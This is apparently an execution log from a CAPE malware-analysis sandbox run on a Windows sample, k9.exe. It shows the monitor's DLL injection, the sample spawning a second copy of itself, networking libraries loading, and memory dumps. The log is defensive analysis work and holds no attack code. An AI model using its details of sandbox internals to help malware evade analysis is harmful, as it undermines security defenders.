Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-06-05 14:10:07 2020-06-05 14:16:26 379 seconds Show Options Show Log
route = tor
2020-05-13 09:28:05,787 [root] INFO: Date set to: 20200605T14:10:06, timeout set to: 200
2020-06-05 14:10:06,078 [root] DEBUG: Starting analyzer from: C:\tmpt2nfl3rg
2020-06-05 14:10:06,078 [root] DEBUG: Storing results at: C:\AZpGbR
2020-06-05 14:10:06,078 [root] DEBUG: Pipe server name: \\.\PIPE\mFlbgljrqG
2020-06-05 14:10:06,078 [root] DEBUG: Python path: C:\Users\Louise\AppData\Local\Programs\Python\Python38-32
2020-06-05 14:10:06,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-05 14:10:06,078 [root] INFO: Automatically selected analysis package "exe"
2020-06-05 14:10:06,078 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-05 14:10:06,593 [root] DEBUG: Imported analysis package "exe".
2020-06-05 14:10:06,593 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-05 14:10:06,593 [root] DEBUG: Initialized analysis package "exe".
2020-06-05 14:10:07,187 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-05 14:10:07,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-05 14:10:07,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-05 14:10:07,468 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-05 14:10:07,468 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-05 14:10:07,484 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-05 14:10:07,484 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-05 14:10:07,500 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-05 14:10:07,500 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-05 14:10:07,593 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-05 14:10:07,593 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-05 14:10:07,671 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-05 14:10:07,671 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-05 14:10:07,671 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-05 14:10:07,671 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-05 14:10:11,328 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-05 14:10:11,390 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-05 14:10:11,453 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-05 14:10:11,453 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-05 14:10:11,453 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-05 14:10:11,453 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-05 14:10:11,468 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-05 14:10:11,562 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-05 14:10:11,562 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-05 14:10:11,562 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-05 14:10:11,562 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-05 14:10:11,562 [root] DEBUG: Started auxiliary module Browser
2020-06-05 14:10:11,578 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-05 14:10:11,578 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-05 14:10:11,578 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-05 14:10:11,578 [root] DEBUG: Started auxiliary module Curtain
2020-06-05 14:10:11,578 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-05 14:10:11,578 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-05 14:10:11,578 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-05 14:10:11,578 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-05 14:10:13,000 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-05 14:10:13,000 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-05 14:10:13,000 [root] DEBUG: Started auxiliary module DigiSig
2020-06-05 14:10:13,000 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-05 14:10:13,000 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-05 14:10:13,000 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Disguise
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Human
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Procmon
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Screenshots
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-05 14:10:13,046 [root] DEBUG: Started auxiliary module Sysmon
2020-06-05 14:10:13,046 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-05 14:10:13,046 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-05 14:10:13,046 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-05 14:10:13,046 [root] DEBUG: Started auxiliary module Usage
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-05 14:10:13,171 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Louise\AppData\Local\Temp\k9.exe" with arguments "" with pid 2940
2020-06-05 14:10:13,171 [lib.api.process] INFO: Monitor config for process 2940: C:\tmpt2nfl3rg\dll\2940.ini
2020-06-05 14:10:13,171 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:13,249 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:13,265 [root] DEBUG: Loader: Injecting process 2940 (thread 4988) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:13,265 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:13,265 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:13,265 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 14:10:13,265 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:13,265 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2940
2020-06-05 14:10:15,281 [lib.api.process] INFO: Successfully resumed process with pid 2940
2020-06-05 14:10:15,546 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 14:10:15,546 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 14:10:15,562 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 14:10:15,562 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 2940 at 0x700a0000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 14:10:15,562 [root] DEBUG: Commandline: C:\Users\Louise\AppData\Local\Temp\"C:\Users\Louise\AppData\Local\Temp\k9.exe".
2020-06-05 14:10:15,671 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:15,671 [root] INFO: loaded: b'2940'
2020-06-05 14:10:15,671 [root] INFO: Loaded monitor into process with pid 2940
2020-06-05 14:10:15,671 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:15,671 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:15,687 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd0 amd local view 0x039C0000 to global list.
2020-06-05 14:10:15,812 [root] DEBUG: DLL loaded at 0x72D40000: C:\Windows\system32\SXS (0x5f000 bytes).
2020-06-05 14:10:16,687 [root] DEBUG: DLL loaded at 0x73850000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-06-05 14:10:17,156 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xf8 amd local view 0x04050000 to global list.
2020-06-05 14:10:17,156 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 14:10:17,171 [root] DEBUG: DLL loaded at 0x748F0000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 14:10:17,187 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x104 amd local view 0x00420000 to global list.
2020-06-05 14:10:17,437 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-05 14:10:17,437 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-05 14:10:22,656 [root] DEBUG: set_caller_info: Adding region at 0x01E60000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 14:10:22,656 [root] DEBUG: set_caller_info: Adding region at 0x01EB0000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 14:10:22,671 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1eb0000
2020-06-05 14:10:22,671 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x01EB0000 size 0x400000.
2020-06-05 14:10:22,671 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_2050060087221056662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?0x01EB0000;?', ['2940'], 'CAPE')
2020-06-05 14:10:22,718 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\AZpGbR\CAPE\2940_2050060087221056662020 (size 0xffe)
2020-06-05 14:10:22,718 [root] DEBUG: DumpRegion: Dumped stack region from 0x01EB0000, size 0x1000.
2020-06-05 14:10:22,750 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1121244092221056662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?0x01E60000;?', ['2940'], 'CAPE')
2020-06-05 14:10:22,781 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\AZpGbR\CAPE\2940_1121244092221056662020 (size 0x3337)
2020-06-05 14:10:22,781 [root] DEBUG: DumpRegion: Dumped stack region from 0x01E60000, size 0x8000.
2020-06-05 14:10:26,078 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,078 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,203 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,218 [root] DEBUG: Loader: Injecting process 2476 (thread 2812) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,218 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,218 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,218 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 14:10:26,218 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,234 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,265 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,265 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,281 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,296 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,312 [root] DEBUG: Loader: Injecting process 2476 (thread 2812) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,312 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,312 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,312 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 14:10:26,312 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,328 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,328 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,328 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,328 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,359 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,359 [root] DEBUG: Loader: Injecting process 2476 (thread 0) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,359 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 14:10:26,375 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2812, handle 0xc4
2020-06-05 14:10:26,375 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,375 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014F0)
2020-06-05 14:10:26,375 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,390 [root] DEBUG: InjectDllViaIAT: Memory region at 0x07000000 not empty.
2020-06-05 14:10:26,390 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 14:10:26,390 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,390 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,406 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_2113382632161156662020', b'4;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?2476;?', ['2940'], 'CAPE')
2020-06-05 14:10:26,421 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,421 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,421 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,453 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,453 [root] DEBUG: Loader: Injecting process 2476 (thread 0) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,453 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 14:10:26,453 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2812, handle 0xc4
2020-06-05 14:10:26,453 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,468 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014F0)
2020-06-05 14:10:26,468 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,468 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 14:10:26,468 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,468 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,484 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,484 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,484 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,500 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,515 [root] DEBUG: Loader: Injecting process 2476 (thread 2812) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,515 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,515 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014F0)
2020-06-05 14:10:26,515 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,515 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 14:10:26,515 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,531 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,640 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_2122580281161156662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?2476;?', ['2940'], 'CAPE')
2020-06-05 14:10:26,781 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1239175382161156662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?2476;?', ['2940'], 'CAPE')
2020-06-05 14:10:26,796 [root] WARNING: Unable to open termination event for pid 2940.
2020-06-05 14:10:26,843 [root] INFO: ('dump_file', 'C:\\Users\\Louise\\AppData\\Local\\Temp\\~DFE3607EB907E82968.TMP', '', False, 'files')
2020-06-05 14:10:26,843 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 14:10:26,859 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 14:10:26,875 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:26,890 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 14:10:26,890 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 2476 at 0x700a0000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 14:10:26,890 [root] INFO: b'C:\\AZpGbR\\CAPE\\2940_1925241130161156662020|2940|0;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?'
2020-06-05 14:10:26,890 [root] DEBUG: Commandline: C:\Users\Louise\AppData\Local\Temp\"C:\Users\Louise\AppData\Local\Temp\k9.exe".
2020-06-05 14:10:26,890 [root] INFO: cape
2020-06-05 14:10:26,906 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1925241130161156662020', b'0;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?', ['2940'], 'procdump')
2020-06-05 14:10:26,921 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1925241130161156662020', '', False, 'files')
2020-06-05 14:10:27,031 [root] INFO: loaded: b'2476'
2020-06-05 14:10:27,031 [root] INFO: Loaded monitor into process with pid 2476
2020-06-05 14:10:29,265 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd4 amd local view 0x75D90000 to global list.
2020-06-05 14:10:29,265 [root] DEBUG: DLL loaded at 0x75D90000: C:\Windows\syswow64\shell32 (0xc4c000 bytes).
2020-06-05 14:10:29,312 [root] DEBUG: DLL loaded at 0x75900000: C:\Windows\syswow64\wininet (0x1c4000 bytes).
2020-06-05 14:10:29,328 [root] DEBUG: DLL loaded at 0x76F10000: C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,343 [root] DEBUG: DLL loaded at 0x75700000: C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,359 [root] DEBUG: DLL loaded at 0x754A0000: C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,359 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\version (0x9000 bytes).
2020-06-05 14:10:29,437 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-06-05 14:10:29,484 [root] DEBUG: DLL loaded at 0x75AD0000: C:\Windows\syswow64\normaliz (0x3000 bytes).
2020-06-05 14:10:29,484 [root] DEBUG: DLL loaded at 0x769F0000: C:\Windows\syswow64\iertutil (0x215000 bytes).
2020-06-05 14:10:29,500 [root] DEBUG: DLL loaded at 0x76DF0000: C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-06-05 14:10:29,515 [root] DEBUG: DLL loaded at 0x73860000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-06-05 14:10:29,531 [root] DEBUG: DLL loaded at 0x74A70000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-05 14:10:29,546 [root] DEBUG: DLL loaded at 0x73850000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-06-05 14:10:29,546 [root] DEBUG: DLL loaded at 0x769E0000: C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,562 [root] DEBUG: DLL loaded at 0x773A0000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-06-05 14:10:29,578 [root] DEBUG: DLL loaded at 0x77140000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-06-05 14:10:29,609 [root] DEBUG: DLL loaded at 0x737F0000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-06-05 14:10:29,609 [root] DEBUG: DLL loaded at 0x737A0000: C:\Windows\system32\webio (0x50000 bytes).
2020-06-05 14:10:29,609 [root] DEBUG: DLL unloaded from 0x737F0000.
2020-06-05 14:10:29,640 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-06-05 14:10:29,640 [root] DEBUG: DLL loaded at 0x73840000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-05 14:10:29,656 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-05 14:10:29,671 [root] DEBUG: DLL loaded at 0x74EA0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-05 14:10:29,671 [root] DEBUG: DLL unloaded from 0x74EB0000.
2020-06-05 14:10:29,687 [root] DEBUG: DLL loaded at 0x73830000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-06-05 14:10:29,703 [root] DEBUG: DLL loaded at 0x737E0000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-05 14:10:29,718 [root] DEBUG: DLL loaded at 0x77150000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-06-05 14:10:29,734 [root] DEBUG: DLL loaded at 0x736C0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 14:10:29,750 [root] DEBUG: DLL loaded at 0x737D0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 14:10:29,750 [root] DEBUG: DLL loaded at 0x737C0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2020-06-05 14:10:29,765 [root] DEBUG: DLL loaded at 0x74A80000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-05 14:10:29,765 [root] DEBUG: DLL loaded at 0x757D0000: C:\Windows\syswow64\urlmon (0x124000 bytes).
2020-06-05 14:10:29,781 [root] DEBUG: DLL loaded at 0x737B0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-05 14:10:29,796 [root] DEBUG: DLL loaded at 0x736A0000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2020-06-05 14:10:29,812 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 14:10:29,828 [root] DEBUG: DLL loaded at 0x748F0000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 14:10:29,843 [root] DEBUG: DLL loaded at 0x74010000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-05 14:10:29,875 [root] DEBUG: DLL loaded at 0x737A0000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-06-05 14:10:30,171 [root] DEBUG: DLL loaded at 0x73660000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-05 14:10:30,203 [root] DEBUG: DLL loaded at 0x74040000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32 (0x19e000 bytes).
2020-06-05 14:10:30,203 [root] DEBUG: DLL unloaded from 0x74A80000.
2020-06-05 14:10:30,218 [root] DEBUG: DLL unloaded from 0x73840000.
2020-06-05 14:10:31,125 [root] DEBUG: CreateThread: Initialising breakpoints for thread 3928.
2020-06-05 14:10:31,140 [root] DEBUG: DLL unloaded from 0x77990000.
2020-06-05 14:10:34,921 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2476).
2020-06-05 14:10:34,953 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x252ec28.
2020-06-05 14:13:35,906 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-05 14:13:35,906 [lib.api.process] ERROR: Failed to open terminate event for pid 2940
2020-06-05 14:13:35,906 [root] INFO: Terminate event set for process 2940.
2020-06-05 14:13:35,906 [lib.api.process] ERROR: Failed to open terminate event for pid 2476
2020-06-05 14:13:35,921 [root] INFO: Terminate event set for process 2476.
2020-06-05 14:13:35,921 [root] INFO: Created shutdown mutex.
2020-06-05 14:13:36,937 [root] INFO: Shutting down package.
2020-06-05 14:13:36,937 [root] INFO: Stopping auxiliary modules.
2020-06-05 14:13:37,500 [lib.common.results] WARNING: File C:\AZpGbR\bin\procmon.xml doesn't exist anymore
2020-06-05 14:13:37,500 [root] INFO: Finishing auxiliary modules.
2020-06-05 14:13:37,500 [root] INFO: Shutting down pipe server and dumping dropped files.
